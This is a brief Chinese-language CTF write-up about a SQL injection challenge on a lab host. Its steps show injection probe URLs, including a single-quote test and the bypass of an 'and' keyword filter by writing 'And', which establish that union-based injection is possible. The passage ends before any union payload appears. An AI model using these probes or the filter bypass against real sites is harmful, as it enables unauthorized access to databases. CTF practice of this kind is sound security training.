前言
题目分类:
CTF—Web—SQL注入—03—联合注入+关键字过滤
一、题目描述
题目:SQL注入
链接:http://192.168.87.175
二、解题步骤
1、回显判断注入方式
Step1: http://192.168.87.175/viewld.do?ldid=2,回显正常。有内容
Step2: http://192.168.87.175/viewld.do?ldid=2’,回显为空,无内容
Step3:http://192.168.87.175/viewld.do?ldid=2 and 1=1,回显为非法字符
Step4:http://192.168.87.175/viewld.do?ldid=2 And 1=1,回显正常。有内容
此时提示and被视为非法字符,and被过滤。
Step5:http://192.168.87.175/viewld.do?ldid=2 And 1=2,回显为空,无内容
此时提示and后的内容被执行,可以尝试联合查询。
注入方式为联合查询。